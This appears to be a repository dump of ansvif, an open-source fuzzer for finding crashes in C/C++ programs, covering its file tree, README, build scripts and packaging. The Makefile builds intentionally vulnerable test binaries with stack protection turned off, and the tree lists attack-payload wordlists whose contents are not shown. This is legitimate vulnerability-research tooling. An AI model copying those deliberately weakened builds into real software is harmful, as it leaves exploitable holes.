├── .externalToolBuilders ├── aclocal.launch ├── autoconf.launch ├── automake.launch ├── configure.launch └── make.launch ├── .gitignore ├── .project ├── Dockerfile ├── LICENSE ├── Makefile.am ├── README.md ├── ansvif.i64 ├── bin ├── debs │ ├── .gitkeep │ ├── ansvif_1.11_amd64 │ │ ├── DEBIAN │ │ │ └── control │ │ ├── share │ │ │ └── man │ │ │ │ └── man1 │ │ │ │ ├── .gitkeep │ │ │ │ ├── ansvif.1.gz │ │ │ │ ├── ansvif_gtk.1.gz │ │ │ │ └── find_suid.1.gz │ │ └── usr │ │ │ └── bin │ │ │ └── .gitkeep │ └── ansvif_1.8_i386 │ │ ├── DEBIAN │ │ └── control │ │ ├── share │ │ └── man │ │ │ └── man1 │ │ │ ├── ansvif.1.gz │ │ │ └── find_suid.1.gz │ │ └── usr │ │ └── bin │ │ └── .gitkeep ├── rpms │ ├── .gitkeep │ └── ansvif.spec └── win │ ├── ansvif.bat │ └── metadata.rc ├── configure.ac ├── examples ├── all ├── biglist ├── nasty │ ├── Command-Injection-commix.txt │ ├── DB2Enumeration.fuzzdb.txt │ ├── FORMATSTRING-JHADDIX.txt │ ├── FuzzingStrings-SkullSecurity.org.txt │ ├── Generic-BlindSQLi.fuzzdb.txt │ ├── Generic-SQLi.txt │ ├── HTML5sec-Injections-JHADDIX.txt │ ├── JSON.Fuzzing.txt │ ├── LDAP.Fuzzinging.txt │ ├── LFI-JHADDIX.txt │ ├── MSSQL-Enumeration.fuzzdb.txt │ ├── MSSQL.fuzzdb.txt │ ├── MYSQL.fuzzdb.txt │ ├── Metacharacters.fuzzdb.txt │ ├── MySQL-Read-Local-Files.fuzzdb.txt │ ├── MySQL-SQLi-Login-Bypass.fuzzdb.txt │ ├── NoSQL.txt │ ├── Oracle.fuzzdb.txt │ ├── Polyglots │ │ ├── SQLi-Polyglots.txt │ │ ├── XSS-Polyglot-Ultimate-0xsobky.txt │ │ ├── XSS-Polyglots-Dmiessler.txt │ │ └── XSS-Polyglots.txt │ ├── Postgres-Enumeration.fuzzdb.txt │ ├── SSI-Injection-JHADDIX.txt │ ├── URI-XSS.fuzzdb.txt │ ├── UnixAttacks.fuzzdb.txt │ ├── UserAgents-IE.txt │ ├── UserAgents.fuzz.txt │ ├── Windows-Attacks.fuzzdb.txt │ ├── XML-FUZZ.txt │ ├── XSS-BYPASS-STRINGS-BRUTELOGIC.txt │ ├── XSS-BruteLogic.txt │ ├── XSS-JHADDIX.txt │ ├── XSS-RSNAKE.txt │ ├── XSS-Vectors-Mario.txt │ ├── XSS-WITH-CONTEXT-JHADDIX.txt │ ├── XXE-Fuzzing.txt │ ├── alphanum-case-extra.txt │ ├── alphanum-case.txt │ ├── big-list-of-naughty-strings.txt │ ├── char.txt │ ├── doble-uri-hex.txt │ ├── extension-test.txt │ ├── lol │ ├── numeric-fields-only.txt │ ├── special-chars.txt │ ├── unicode.txt │ ├── uri-hex.txt │ └── useragents-ie.txt └── specific │ ├── blank.txt │ ├── chrome_t.txt │ ├── flag_chars.txt │ ├── htmltags.txt │ ├── http.txt │ ├── linux_syscalls.list │ ├── linux_syscalls_implemented.list │ ├── math.txt │ ├── mogrify_t.txt │ ├── mount_e.txt │ ├── mount_o.txt │ ├── mount_t.txt │ ├── networking.txt │ ├── sample.gif │ ├── sample.mkv │ ├── snap-confine_e.txt │ ├── snap-profile │ ├── space.txt │ ├── sudo.txt │ └── test-win.txt ├── icons ├── icon.ico └── icon.jpg ├── include ├── gzstream │ ├── .deps │ │ └── .dirstamp │ ├── .dirstamp │ ├── .gitignore │ ├── COPYING.LIB │ ├── Makefile │ ├── README │ ├── gzstream.cpp │ ├── gzstream.h │ ├── index.html │ ├── logo.gif │ └── version ├── md5.h ├── stack.h └── xmlwriter │ └── xml_writer.hpp ├── make_win.bat ├── man ├── ansvif.1.gz ├── ansvif_gtk.1.gz └── find_suid.1.gz ├── src ├── .deps │ └── .dirstamp ├── .dirstamp ├── bin2hex.cpp ├── buffer_overflow.c ├── file_check.cpp ├── generic_buffer_overflow.c ├── gtk.cpp ├── help.cpp ├── linux │ ├── .deps │ │ └── .dirstamp │ ├── .dirstamp │ └── syscalls.cpp ├── log.cpp ├── main.cpp ├── man_read.cpp ├── match_fault.cpp ├── null_pointer.c ├── oxagast.cpp ├── popen2.cpp ├── randomizer.cpp ├── reaper.cpp ├── remove_chars.cpp ├── string_format.c ├── sys_string.cpp ├── templates.cpp ├── to_int.cpp ├── trash.cpp ├── version.h ├── win │ └── printf.c └── write_file.cpp ├── tmp └── .gitkeep └── tools ├── bermise_fuzz.sh └── find_suid.sh /.externalToolBuilders/aclocal.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.externalToolBuilders/autoconf.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /.externalToolBuilders/automake.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.externalToolBuilders/configure.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /.externalToolBuilders/make.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.l[ao] 2 | *~ 3 | *.o 4 | *.a 5 | *.exe 6 | *.swp 7 | metadata.res 8 | ansvif 9 | faulty 10 | find_suid 11 | syscalls 12 | ansvif_gtk 13 | null_pointer 14 | string_format 15 | generic_buffer_overflow 16 | configure 17 | *.log 18 | !/man/* 19 | !/tmp/* 20 | /tmp/1 21 | !/bin/rpms/ansvif.spec 22 | !/bin/debs/ansvif_*/DEBIAN 23 | !/bin/debs/ansvif_*/DEBIAN/control 24 | !/bin/debs/ansvif_*/usr/share/man/man1/*gz 25 | compile 26 | install-sh 27 | depcomp 28 | missing 29 | src/.clang-format 30 | src/linux/.clang-format 31 | src/win/.clang-format 32 | config.guess 33 | config.sub 34 | test-driver 35 | /autom4te.cache/ 36 | *.Po 37 | Makefile 38 | Makefile.in 39 | config.log 40 | config.status 41 | aclocal.m4 42 | -------------------------------------------------------------------------------- /.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | Code_ansvif 4 | 5 | 6 | 7 | 8 | 9 | org.eclipse.ui.externaltools.ExternalToolBuilder 10 | full,incremental, 11 | 12 | 13 | LaunchConfigHandle 14 | <project>/.externalToolBuilders/aclocal.launch 15 | 16 | 17 | 18 | 19 | org.eclipse.ui.externaltools.ExternalToolBuilder 20 | full,incremental, 21 | 22 | 23 | LaunchConfigHandle 24 | <project>/.externalToolBuilders/autoconf.launch 25 | 26 | 27 | 28 | 29 | org.eclipse.ui.externaltools.ExternalToolBuilder 30 | full,incremental, 31 | 32 | 33 | LaunchConfigHandle 34 | <project>/.externalToolBuilders/automake.launch 35 | 36 | 37 | 38 | 39 | org.eclipse.ui.externaltools.ExternalToolBuilder 40 | full,incremental, 41 | 42 | 43 | LaunchConfigHandle 44 | <project>/.externalToolBuilders/configure.launch 45 | 46 | 47 | 48 | 49 | org.eclipse.ui.externaltools.ExternalToolBuilder 50 | full,incremental, 51 | 52 | 53 | LaunchConfigHandle 54 | <project>/.externalToolBuilders/make.launch 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | 3 | WORKDIR /src 4 | 5 | RUN apt update && apt-get --no-install-recommends -yqq install \ 6 | ca-certificates \ 7 | git \ 8 | automake \ 9 | autoconf-archive \ 10 | zlib1g-dev \ 11 | g++ \ 12 | libgcc-4.8-dev \ 13 | gcc \ 14 | gtk2.0 15 | 16 | RUN git clone https://github.com/oxagast/ansvif.git 17 | WORKDIR ansvif 18 | RUN aclocal 19 | RUN autoconf 20 | RUN automake -a 21 | RUN ./configure --disable-gtk 22 | RUN make 23 | 24 | 25 | CMD ./ansvif -t examples/specific/flag_chars.txt -c ./generic_buffer_overflow -b 64 -z -L root 26 | -------------------------------------------------------------------------------- /Makefile.am: -------------------------------------------------------------------------------- 1 | AUTOMAKE_OPTIONS = foreign 2 | ACLOCAL_AMFLAGS = ${ACLOCAL_FLAGS} 3 | if WITH_GTK 4 | bin_PROGRAMS = ansvif ansvif_gtk generic_buffer_overflow string_format null_pointer 5 | endif 6 | if WITH_SYSCALLS 7 | bin_PROGRAMS = ansvif syscalls 8 | endif 9 | if WITH_TESTCODE 10 | bin_PROGRAMS = ansvif generic_buffer_overflow string_format null_pointer 11 | else 12 | bin_PROGRAMS = ansvif 13 | endif 14 | noinst_LIBRARIES = libgzstream.a 15 | libgzstream_a_SOURCES = include/gzstream/gzstream.h include/gzstream/gzstream.cpp 16 | if OS_IS_KALI 17 | SUBDIRS = include/gzstream/ 18 | endif 19 | ansvif_SOURCES = src/log.cpp src/bin2hex.cpp src/popen2.cpp src/main.cpp src/help.cpp src/match_fault.cpp src/sys_string.cpp src/man_read.cpp src/trash.cpp src/randomizer.cpp src/remove_chars.cpp src/to_int.cpp src/file_check.cpp src/reaper.cpp src/write_file.cpp src/templates.cpp src/oxagast.cpp src/version.h include/gzstream/gzstream.h include/xmlwriter/xml_writer.hpp include/stack.h 20 | if OS_IS_REDHAT 21 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 22 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 23 | ansvif_CPPFLAGS = -O3 -D __REDHAT__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 24 | endif 25 | if OS_IS_DEBIAN 26 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 27 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 28 | ansvif_CPPFLAGS = -O3 -D __DEBIAN__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 29 | endif 30 | if OS_IS_ARCH 31 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 32 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 33 | ansvif_CPPFLAGS = -O3 -D __ARCH__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 34 | endif 35 | if OS_IS_FREEBSD 36 | ansvif_LDADD = -lstdc++ -lz -L. 37 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux -pthread 38 | ansvif_CPPFLAGS = -O3 -D __DEBIAN__ -D __FREEBSD__ -D __NOTANDROID__ -Wl,--no-as-needed -std=c++11 -ftemplate-depth=1024 39 | endif 40 | if OS_IS_KALI 41 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 42 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 43 | ansvif_CPPFLAGS = -O3 -D __KALI__ -D __DEBIAN__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 44 | endif 45 | if WITH_TESTCODE 46 | generic_buffer_overflow_SOURCES = src/generic_buffer_overflow.c 47 | generic_buffer_overflow_CFLAGS = -ansi -fno-stack-protector -D_GNU_SOURCE -Wno-implicit-function-declaration 48 | string_format_SOURCES = src/string_format.c 49 | string_format_CFLAGS = -ansi -D_GNU_SOURCE -Wno-format-security 50 | null_pointer_SOURCES = src/null_pointer.c 51 | endif 52 | if WITH_SYSCALLS 53 | syscalls_SOURCES = src/linux/syscalls.cpp 54 | syscalls_CPPFLAGS = -ansi -Wno-unused-result -Wno-nonnull -std=c++11 55 | endif 56 | if WITH_GTK 57 | ansvif_gtk_SOURCES = src/gtk.cpp src/popen2.cpp src/file_check.cpp 58 | ansvif_gtk_LDADD = @GTK_LIBS@ 59 | ansvif_gtk_CPPFLAGS = @GTK_CFLAGS@ -D __NOTANDROID__ 60 | endif 61 | ansvifdir = bin 62 | check: all 63 | ./ansvif -t examples/specific/space.txt -c ./generic_buffer_overflow -b 64 -o checkfaulty && rm checkfaulty.* 64 | @echo "*** CHECK 1 PASSED ***" 65 | ./ansvif -t examples/specific/space.txt -c ./generic_buffer_overflow -b 64 66 | @echo "*** CHECK 2 PASSED ***" 67 | ./ansvif -t examples/specific/space.txt -c ./string_format -b 32 68 | @echo "*** CHECK 3 PASSED ***" 69 | @echo "*** ALL TESTS PASSED ***" 70 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ansvif 2 | *A Not So Very Intelligent Fuzzer* 3 | 4 | Marshall Whittaker 5 | 6 | oxagast 7 | 8 | marshallwhittaker@gmail.com 9 | 10 | *As the complexity of a system rises, as does the potential for problems within that system.* 11 | 12 | *--Whittaker's Law* 13 | 14 | 15 | **Compile Dependancies:** 16 | 17 | automake autoconf-archive zlib1g-dev g++ gcc (and libgtk2.0-dev if you want GTK support) 18 | 19 | **Compliation:** 20 | 21 | *Linux:* 22 | ``` 23 | $ aclocal && autoconf && automake -a && ./configure && make && make check 24 | ``` 25 | Or, if you would like to play with the syscall fuzzer: 26 | ``` 27 | $ aclocal && autoconf && automake -a && ./configure --enable-syscalls && make && make check 28 | ``` 29 | If you would like to disable the GTK frontend you can do: 30 | ``` 31 | $ aclocal && autoconf && automake -a && ./configure --disable-gtk && make && make check 32 | ``` 33 | *FreeBSD* 34 | 35 | Assuming you installed g++ from ports (as you will need to for C++11): 36 | 37 | ``` 38 | $ aclocal && autoconf && automake -a && ./configure && make && make check 39 | ``` 40 | 41 | *OpenBSD:* 42 | 43 | Assuming you installed g++ from ports (as you will need to for C++11): 44 | 45 | ``` 46 | $ CXX=$(find / -name 'eg++' 2>/dev/null | grep ports | head -n 1) AUTOCONF_VERSION=2.69 AUTOMAKE_VERSION=1.15 autoreconf -fmi 47 | ``` 48 | *Windows:* 49 | 50 | Windows binaries are now desgined to be compiled with MinGW-W64 (since we use threading download 51 | a version of MinGW-W64 g++ with seh). 52 | You can try compiling after installing MinGW-W64 g++ with seh (only) by clicking on the included make_win.bat script. If that fails, it is likely due to the environment, so try the below. 53 | 54 | (Go to where you installed MinGW-W64 and click mingw-64.bat) 55 | 56 | ``` 57 | windres metadata.rc -O coff -o metadata.res 58 | g++.exe src/common.cpp src/bin2hex.cpp src/popen2.cpp src/main.cpp src/help.cpp src/match_fault.cpp src/sys_string.cpp src/man_read.cpp src/randomizer.cpp src/trash.cpp src/log.cpp metadata.res src/version.h -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++ 59 | gcc src/win/printf.c -o printf.exe 60 | ``` 61 | 62 | 63 | Note: cygwin .dll external files are no longer required as we now compile with g++ from MinGW. 64 | In Windows 7 Powershell v2 is installed by default, however, this program requires atleast 65 | Powershell v5. Windows 10 includes powershell v5. You can go to Microsoft's site and download 66 | the Windows Management Framework (which includes newer Versions of Powershell here: 67 | 68 | https://www.microsoft.com/en-us/download/details.aspx?id=50395 69 | 70 | **Testing:** 71 | 72 | If you would like to try out the example code, you can compile faulty.c with: 73 | ``` 74 | $ gcc faulty.c -o faulty 75 | ``` 76 | You can also simply run `make check`. 77 | 78 | **Useage:** 79 | 80 | *Important note: Windows users will have to run ansvif.exe from Powershell for it to work!* 81 | 82 | ``` 83 | $ ./find_suid /usr/bin/ /bin/ /sbin/ 84 | $ ./ansvif -[tm] [template/manpage] -c /path/to/executable -b buffersize 85 | ``` 86 | **Examples:** 87 | 88 | *Linux/BSD:* 89 | ``` 90 | $ ulimit -c unlimited 91 | $ ./ansvif -m mount -c /bin/mount -e examples/mount_e.txt -x examples/mount_o.txt\ 92 | -f 8 -b 2048 93 | $ ./ansvif -t examples/blank.txt -F tmp/tmphtml -x examples/htmltags.txt -c /usr/bin/iceweasel -b\ 94 | 128 -A "file:///home/username/src/ansvif/tmp/tmphtml" -f 2 -n -R "sleep 3 && killall\ 95 | iceweasel" -S ">" 96 | $ cat examples/linux_syscalls_implemented.list | xargs -P \ 97 | `cat examples/linux_syscalls_implemented.list | wc -l` -I {calls} ./ansvif -t examples/space.txt \ 98 | -B "{calls} " -c ./syscalls -o syscall_crash -f 1 -z -d -b 16 99 | ``` 100 | 101 | *Windows:* 102 | ``` 103 | PS C:\ansvif\bin\ansvif_win> .\ansvif -t ..\..\examples\space -F ..\..\tmp\tmphtml -x ` 104 | ..\..\examples\htmltags -c ` 105 | 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' ` 106 | -b 128 -A "file:///C:\\Users\marsh\OneDrive\Documents\Code\ansvif\tmp\tmphtml" ` 107 | -f 2 -n -S ">" -R "sleep 2 ; Stop-Process -Name chrome" 108 | ``` 109 | 110 | **Options:** 111 | 112 | ansvif 113 | 114 | ``` 115 | -t This file should hold line by line command arguments as shown in the example file. 116 | -e This file should hold line by line environment variables as shown in the example 117 | file. You can usually get these by doing something like: 118 | $ strings /bin/mount | perl -ne 'print if /[A-Z]=$/' > mount_envs 119 | -c Specifies the command path. 120 | -p Specifies the manpage location (as an integer, usually 1 or 8) 121 | -m Specifies the commands manpage. 122 | -D Dumps whats found in the manpage. 123 | -f Number of threads to use. Default is 2. 124 | -b Specifies the buffer size to fuzz with. 256-2048 Is usually sufficient. 125 | -r Uses only random garbage data. 126 | -o Writes output to log file. 127 | -z Randomize the buffer size from 1 to what is specified by -b. 128 | -x Other junk to put in. Usernames and such can go here. 129 | -S Seperator between options. 130 | -s Omitted character specification. Defaults are <>\\n |&\[]\()\{}:;\ and newline is mandatory. 131 | -T Timeout for threads. 132 | -W Timeout for threads. 133 | -L Unpriviledged user to run as if root. 134 | -A Always put whats after this after command to run. 135 | -B Always put whats after this before the command to run. 136 | -F File to feed into the program that -x along with normal fuzzing data will be put in. 137 | -n Never use random data in the fuzz. 138 | -R Run this command after each fuzz. 139 | -C A Non standard error code to detect. 140 | -V Use Valgrind if installed. 141 | -1 Try to make it fault once, if it doesn't happen, throw error code 64. Useful for scripting. 142 | -P Use % to represent binary in fuzz. 143 | -M Max arguments to use in the fuzz. 144 | -y Short for -b 0 and usually only useful with -A or -B. 145 | -K Keep fuzzing after a crash in the target. 146 | -E A command to be run before the fuzzed program. 147 | -0 No NULL characters in the fuzz. 148 | -N Shorthand for -R "pkill prog". 149 | -v Verbose. 150 | -d Debug data. 151 | -h Shows the help page. 152 | -i Prints version information. 153 | ``` 154 | ansvif_gtk 155 | 156 | ``` 157 | -l Shortcut for -p ./ansvif 158 | -p The location of the ansvif binary 159 | ``` 160 | 161 | **Recommendations:** 162 | It is recommended that if you are doing long fuzzes or file fuzzing, if possible 163 | put the files (including the binary you are fuzzing if possible) in memory. 164 | This means, put them somewhere like /var/run/shm where disk thrash will be 165 | minimal, and fuzzing will be somewhat faster, especially if large files are being 166 | handled. Be warned however: You will lose your fuzzed files if they are in shm 167 | and you reboot the machine! 168 | 169 | **DO NOT RUN THIS CODE IN A PRODUCTION ENVIRONMENT!** 170 | If you try setting faulty.c's output to suid(0) then *PLEASE* do it in a virtual machine. 171 | or atleast a machine that you don't care about. 172 | Other than that, just play around and have fun! 173 | 174 | 175 | **Notes:** 176 | 177 | Windows users must have ansvif running from Powershell. 178 | Linux and Windows code should be relatively stable. 179 | Syscall fuzzing under linux is under heavy development. 180 | 181 | 182 | **Thanks** 183 | 184 | Thanks to dll999 for syscall fuzzing ideas. 185 | Thanks to moo from #2600 on 2600net for a few recommendations on the wiki writeup. 186 | Thanks to god knows how many people on IRC and StackOverflow. 187 | Thanks to DarkSt0rm for fixing a bug in the Makefile. 188 | -------------------------------------------------------------------------------- /ansvif.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/ansvif.i64 -------------------------------------------------------------------------------- /bin/debs/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/.gitkeep -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: ansvif 2 | Version: 1.11 3 | Section: base 4 | Priority: optional 5 | Architecture: amd64 6 | Depends: zlib1g, libgtk2.0-0 7 | Recommends: gcc, g++, gdb 8 | Suggests: valgrind 9 | Maintainer: Marshall Whittaker 10 | Description: fuzzes other programs for bugs 11 | A Not So Very Intelligent Fuzzer 12 | ansvif is a tool designed to help researchers find code vulnerabilities and bugs. 13 | -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/.gitkeep -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif_gtk.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif_gtk.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/find_suid.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/find_suid.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/usr/bin/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/usr/bin/.gitkeep -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: ansvif 2 | Version: 1.6-1 3 | Section: base 4 | Priority: optional 5 | Architecture: i386 6 | Depends: zlib1g 7 | Recommends: gcc, g++, gdb 8 | Suggests: valgrind 9 | Maintainer: Marshall Whittaker 10 | Description: fuzzes other programs for bugs 11 | A Not So Very Intelligent Fuzzer 12 | ansvif is a tool designed to help researchers find code vulnerabilities and bugs. 13 | -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/share/man/man1/ansvif.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.8_i386/share/man/man1/ansvif.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/share/man/man1/find_suid.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.8_i386/share/man/man1/find_suid.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/usr/bin/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.8_i386/usr/bin/.gitkeep -------------------------------------------------------------------------------- /bin/rpms/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/rpms/.gitkeep -------------------------------------------------------------------------------- /bin/rpms/ansvif.spec: -------------------------------------------------------------------------------- 1 | Name: ansvif 2 | Version: 1.9.1 3 | Release: 1%{?dist} 4 | Summary: A Not So Very Intelligent Fuzzer 5 | 6 | License: GPLv2 7 | URL: http://oxagast.github.io/ansvif 8 | Source0: %{name}-%{version}.tar.gz 9 | 10 | BuildRequires: gcc automake autoconf zlib-devel cryptopp-devel 11 | Requires: gcc 12 | 13 | %description 14 | A Not So Very Intelligent Fuzzer: An advanced cross platform featureful fuzzing framework designed to find vulnerabilities in C/C++ code. 15 | 16 | %prep 17 | %autosetup 18 | 19 | 20 | %build 21 | aclocal && autoconf && automake -a 22 | %configure 23 | %make_build 24 | 25 | %install 26 | rm -rf $RPM_BUILD_ROOT 27 | mkdir -p %{buildroot}/%{_mandir}/man1 28 | cp man/*gz %{buildroot}/%{_mandir}/man1 29 | mkdir -p %{buildroot}/%{_bindir} 30 | cp tools/find_suid.sh %{buildroot}/usr/bin/find_suid 31 | mkdir -p %{buildroot}/usr/share/ansvif/examples 32 | cp examples/all examples/specific examples/biglist %{buildroot}/usr/share/ansvif/examples -r 33 | %make_install 34 | 35 | 36 | %define _unpackaged_files_terminate_build 0 37 | %files 38 | %license LICENSE 39 | %{_mandir}/man1/ansvif.1.gz 40 | %{_mandir}/man1/find_suid.1.gz 41 | %{_bindir}/ansvif 42 | %{_bindir}/find_suid 43 | %{_bindir}/ansvif_gtk 44 | /usr/share/ansvif/examples/biglist 45 | /usr/share/ansvif/examples/all 46 | /usr/share/ansvif/examples/specific/ 47 | 48 | %changelog 49 | * Tue Apr 17 2018 Marshall Lee Whittaker 50 | - 51 | -------------------------------------------------------------------------------- /bin/win/ansvif.bat: -------------------------------------------------------------------------------- 1 | powershell.exe -noexit -command "& '.\ansvif' -h" -------------------------------------------------------------------------------- /bin/win/metadata.rc: -------------------------------------------------------------------------------- 1 | id ICON "icons\\icon.ico" 2 | 1 VERSIONINFO 3 | FILEVERSION 1,8,1,1 4 | PRODUCTVERSION 1,0,0,0 5 | BEGIN 6 | BLOCK "StringFileInfo" 7 | BEGIN 8 | BLOCK "080904E4" 9 | BEGIN 10 | VALUE "CompanyName", "oxagast" 11 | VALUE "FileDescription", "ansvif" 12 | VALUE "FileVersion", "1.8.1" 13 | VALUE "InternalName", "ansvif" 14 | VALUE "LegalCopyright", "GPL2" 15 | VALUE "OriginalFilename", "ansvif.exe" 16 | VALUE "ProductName", "A Not So Very Intelligent Fuzzer" 17 | VALUE "ProductVersion", "1" 18 | END 19 | END 20 | BLOCK "VarFileInfo" 21 | BEGIN 22 | VALUE "Translation", 0x809, 1252 23 | END 24 | END -------------------------------------------------------------------------------- /configure.ac: -------------------------------------------------------------------------------- 1 | AC_INIT([ansvif], [1.11], [marshallwhittaker@gmail.com], [], [https://oxagast.github.io/ansvif]) 2 | AC_PROG_CC 3 | AC_PROG_CXX 4 | AC_LANG([C++]) 5 | AC_TYPE_SIZE_T 6 | AC_PROG_RANLIB 7 | #AC_CONFIG_HEADERS([include/gzstream/gzstream.h]) 8 | AC_HEADER_STDC 9 | #AX_CXX_COMPILE_STDCXX_11([noext],[mandatory]) 10 | AX_CXX_COMPILE_STDCXX_11 11 | AC_CHECK_HEADERS([string]) 12 | AC_CHECK_HEADERS([ipstream]) 13 | AC_CHECK_HEADERS(zlib.h) 14 | #AC_CHECK_HEADERS([lz]) 15 | #AC_SEARCH_LIBS(z) 16 | #AC_CHECK_HEADERS([crypto]) 17 | AC_CHECK_LIB(pthread, pthread_create, have_pthread=yes) 18 | AC_CONFIG_FILES([Makefile]) 19 | AM_INIT_AUTOMAKE([subdir-objects]) 20 | # This adds the option of compiling without using the ctemplate library, 21 | # which has proved troublesome for compilation on some platforms 22 | AC_ARG_ENABLE(syscalls, 23 | [ --enable-syscalls Enable Syscalls compiliation (experimental)], 24 | [case "${enableval}" in 25 | yes) WITH_SYSCALLS=true ;; 26 | no) WITH_SYSCALLS=false ;; 27 | *) AC_MSG_ERROR(bad value ${enableval} for --enable-syscalls) ;; 28 | esac],[WITH_SYSCALLS=false]) 29 | AM_CONDITIONAL([WITH_SYSCALLS], [test "$WITH_SYSCALLS" = "true"]) 30 | # try to compile syscalls if they're enabled 31 | if test "$WITH_SYSCALLS" = "true"; then 32 | AC_DEFINE([WITH_SYSCALLS], [], ["build syscalls module"]) 33 | AC_MSG_NOTICE([syscalls enabled, we will try to compile them]) 34 | else 35 | AC_MSG_NOTICE([syscalls module is disabled]) 36 | fi 37 | 38 | AC_ARG_ENABLE(gtk, 39 | [ --disable-gtk Enable GTK compiliation (experimental)], 40 | [case "${enableval}" in 41 | yes) WITH_GTK=true ;; 42 | no) WITH_GTK=false ;; 43 | *) AC_MSG_ERROR(bad value ${enableval} for --disable-gtk) ;; 44 | esac],[WITH_GTK=true]) 45 | AM_CONDITIONAL([WITH_GTK], [test "$WITH_GTK" = "true"]) 46 | # try to compile syscalls if they're enabled 47 | if test "$WITH_GTK" = "false"; then 48 | AC_MSG_NOTICE([GTK module is disabled]) 49 | else 50 | AC_DEFINE([WITH_GTK], [], ["build GTK module"]) 51 | AC_MSG_NOTICE([GTK enabled, we will try to compile them]) 52 | PKG_CHECK_MODULES(GTK, [gtk+-2.0]) 53 | # PKG_CHECK_MODULES([gtk+-2.0]) 54 | fi 55 | 56 | AC_ARG_ENABLE(testcode, 57 | [ --disable-testcode Disable Test Code)], 58 | [case "${enableval}" in 59 | yes) WITH_TESTCODE=true ;; 60 | no) WITH_TESTCODE=false ;; 61 | *) AC_MSG_ERROR(bad value ${enableval} for --disable-testcode) ;; 62 | esac],[WITH_TESTCODE=true]) 63 | AM_CONDITIONAL([WITH_TESTCODE], [test "$WITH_TESTCODE" = "true"]) 64 | if test "$WITH_TESTCODE" = "false"; then 65 | AC_MSG_NOTICE([Test Code is disabled]) 66 | else 67 | AC_DEFINE([WITH_TESTCODE], [], ["build Test Code"]) 68 | AC_MSG_NOTICE([Test Code, we will try to compile them]) 69 | fi 70 | 71 | 72 | AM_CONDITIONAL(OS_IS_REDHAT, [ test `grep "Fedora\|Redhat" /etc/os-release | wc 